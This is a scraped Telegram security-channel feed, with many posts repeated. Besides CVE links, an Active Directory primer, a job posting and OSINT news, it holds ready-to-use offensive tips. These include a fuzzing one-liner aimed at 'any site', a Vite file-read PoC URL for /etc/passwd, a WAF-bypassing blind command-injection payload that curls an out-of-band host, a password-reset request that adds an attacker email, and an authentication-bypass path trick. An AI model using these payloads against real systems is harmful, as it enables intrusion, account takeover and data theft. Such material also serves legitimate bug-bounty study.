Forwarded from BM SECURITY Group 🇺🇿
🔥 Forensics artifacts collection | inquisitor
GUI va CLI ko`rinishida ishlovchi raqamli ekspertiza uchun ishlatiladigan ochiq kodli windows os uchun dastur.
TOP servislar , resurslar haqida , loglar , event va tizimdagi muhim ma`lumotlarni aniqlash uchun ishlatiladi.
Telegram kanalimiz : @best_master_uz_official
GUI va CLI ko`rinishida ishlovchi raqamli ekspertiza uchun ishlatiladigan ochiq kodli windows os uchun dastur.
TOP servislar , resurslar haqida , loglar , event va tizimdagi muhim ma`lumotlarni aniqlash uchun ishlatiladi.
Telegram kanalimiz : @best_master_uz_official
🔥1
https://ab57.ru/cmdlist/icacls.html
https://ss64.com/nt/icacls.html
icacls for manage for Windows file system
this command need for Privilage Escalation
https://ss64.com/nt/icacls.html
icacls for manage for Windows file system
this command need for Privilage Escalation
Reference: https://github.com/minio/minio/security/advisories/ghsa-6xvq-wj2x-3h3q
Vuln: Information Disclosure
Severity: Critical
CVE-2023-28432
#POC #Pentest #Minio
Vuln: Information Disclosure
Severity: Critical
CVE-2023-28432
#POC #Pentest #Minio
POC —> https://www.exploit-db.com/exploits/51734
Minio 2022-07-29T19-40-48Z - Path traversal
CVE-2022-35919
#POC #Pentest #Minio
Minio 2022-07-29T19-40-48Z - Path traversal
CVE-2022-35919
#POC #Pentest #Minio
Discover Web Vulns Like a Pro! 🔥
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here’s a killer one-liner I’ve been using:
What’s it do?
1️⃣ Grabs URLs: gau digs up every URL for target.com from the web’s archives.
2️⃣ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3️⃣ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4️⃣ Fuzzes Hard: ffuf blasts payloads from my custom lists—XSS popups, file leaks, you name it!
5️⃣ Saves the Loot: Results land in param_vulns.txt for you to exploit.
💡 Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here’s a killer one-liner I’ve been using:
gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt
What’s it do?
1️⃣ Grabs URLs: gau digs up every URL for target.com from the web’s archives.
2️⃣ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3️⃣ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4️⃣ Fuzzes Hard: ffuf blasts payloads from my custom lists—XSS popups, file leaks, you name it!
5️⃣ Saves the Loot: Results land in param_vulns.txt for you to exploit.
💡 Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
Discord
Join the Brut Security Discord Server!
Check out the Brut Security community on Discord - hang out with 950 other members and enjoy free voice and text chat.
👍1🔥1
CVE-2025-30208 affects #Vite (prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10). When exposed to the network (--host flag), it allows arbitrary file read: /etc/passwdor C:\Windows\win.ini by appending ?raw?? or ?import&raw??.
PoC: https://1.2.3.4/etc/passwd?raw??
#BugBounty
PoC: https://1.2.3.4/etc/passwd?raw??
#BugBounty
↳ JavaScript Static Analysis - Locate Dangerous Functions
• An open-source analysis tool to detect vulnerabilities in code is Semgrep. You can configure your own detection rules or use rules created by the community.
• Interesting functions and properties in JavaScript are for example:
#bugbounty #pentest #bugbountyTips
• An open-source analysis tool to detect vulnerabilities in code is Semgrep. You can configure your own detection rules or use rules created by the community.
• Interesting functions and properties in JavaScript are for example:
Element.innerHTML eval() window.postMessage() window.addEventListener() window.localStorage window.sessionStorage document.cookie
#bugbounty #pentest #bugbountyTips
SecList for CyberStudents
CVE-2025-30208 affects #Vite (prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10). When exposed to the network (--host flag), it allows arbitrary file read: /etc/passwdor C:\Windows\win.ini by appending ?raw?? or ?import&raw??. PoC: https://1.2.3.4/etc/passwd?raw??…
https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner
https://github.com/sumeet-darekar/CVE-2025-30208
https://github.com/sumeet-darekar/CVE-2025-30208
GitHub
GitHub - keklick1337/CVE-2025-30208-ViteVulnScanner: CVE-2025-30208 ViteVulnScanner
CVE-2025-30208 ViteVulnScanner. Contribute to keklick1337/CVE-2025-30208-ViteVulnScanner development by creating an account on GitHub.
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It is used to manage and organize computers, users, and resources within a network. AD provides authentication and authorization services, allowing administrators to control access to network resources efficiently.
Key Components of Active Directory:
1. Domain Controller (DC) – A server that stores AD data and handles authentication.
2. Organizational Units (OUs) – Logical containers for organizing users, groups, and computers.
3. Groups & Users – Define permissions and access control.
4. Group Policy (GPO) – Used to enforce security settings and configurations.
5. Forest & Domains – A hierarchical structure that organizes multiple AD domains.
Key Components of Active Directory:
1. Domain Controller (DC) – A server that stores AD data and handles authentication.
2. Organizational Units (OUs) – Logical containers for organizing users, groups, and computers.
3. Groups & Users – Define permissions and access control.
4. Group Policy (GPO) – Used to enforce security settings and configurations.
5. Forest & Domains – A hierarchical structure that organizes multiple AD domains.
👍1🔥1
Образование и опыт:
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7
@sherzodubaydullaev
Yoki Junior Network Engineer bo'lsa ham bo'ladi
Опыт работы 2–5 лет в сфере сетевой безопасности.
Глубокие знания сетевых протоколов и технологий (BGP, OSPF, VLAN, IPsec).
Навыки и знания:
Администрирование и настройка SIEM-систем (Splunk, QRadar).
Опыт работы с WAF, DLP, PAM, IAM.
Работа с NGFW (Next-Gen Firewall) и межсетевыми экранами (FortiGate, Palo Alto, Cisco ASA).
Анализ уязвимостей и тестирование на проникновение (pentest).
Опыт работы с Linux/Windows на продвинутом уровне.
Желательные сертификаты:
Cisco CCNP Security
Fortinet NSE 4-7
@sherzodubaydullaev
Yoki Junior Network Engineer bo'lsa ham bo'ladi
Forwarded from OSINT
Индия начала зачистку OSINT-платформ
#OSINT #News
Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.
⚠️ Под удар попали платформы, работающие с leaked data, dark web и hack dumps — теперь правоохранители и спецслужбы займутся их блокировкой и уголовным преследованием.
🔗 Подробнее: The420.in
LH | Новости | Курсы | OSINT
#OSINT #News
Власти Индии объявили охоту на OSINT-сервисы, которые занимаются сбором и продажей утечек, взломанных баз и даркнет-данных. В официальном заявлении отмечается, что подобные действия нарушают законы о персональных данных и представляют угрозу национальной безопасности.
LH | Новости | Курсы | OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
POC: https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
#CVE
Pre-Auth SQL Injection
CVE-2025-24799
Severity : Critical
#CVE
👍1
Forwarded from Brut Security (Emon Shaikh)
🔥Never forget to check for blind RCE!💥
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline — URL encoded)
And boom — Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline — URL encoded)
And boom — Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
Password Reset Bypass Trick 🌀
Some poorly secured endpoints accept multiple email parameters.😳
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails… you’re in.⚡
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰
#bugbountytips
Some poorly secured endpoints accept multiple email parameters.😳
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails… you’re in.⚡
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰
#bugbountytips
🔥You can find💥
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass ✅
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass ✅
👏1